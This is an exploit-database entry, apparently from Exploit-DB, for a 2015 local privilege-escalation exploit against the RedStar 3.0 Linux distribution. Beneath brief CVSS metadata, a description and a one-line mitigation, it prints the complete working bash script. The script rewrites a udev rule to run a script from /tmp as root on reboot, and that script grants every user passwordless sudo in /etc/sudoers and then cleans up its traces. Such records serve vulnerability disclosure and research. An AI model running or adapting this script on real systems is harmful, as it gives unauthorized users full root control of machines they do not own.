RedStar 3.0 Local Root Exploit

vendor:

RedStar 3.0

by:

HackerFantastic

7.8

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: RedStar 3.0

Affected Version From: RedStar 3.0

Affected Version To: RedStar 3.0

Patch Exists: No

Related CWE: N/A

CPE: o:redstar:redstar_3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2015

RedStar 3.0 Local Root Exploit

This exploit is used to gain root access on RedStar 3.0 systems. It involves creating a malicious udev rule which will execute a shell script that adds a new entry to the sudoers file. This allows the user to gain root access without a password.

Mitigation:

The user should ensure that the udev rules are not modified and that the sudoers file is not modified without authorization.

Source

Exploit-DB raw data:

#!/bin/bash -e

## Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png
## Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png

cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak
echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules
cat <<EOF >/tmp/r00t.sh
echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers
mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules
chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules
rm /tmp/r00t.sh
EOF
chmod +x /tmp/r00t.sh
echo "sudo will be available after reboot"
sleep 2
reboot

## Source: https://twitter.com/sfan55/status/550348619652796416 & http://www.openwall.com/lists/oss-security/2015/01/09/6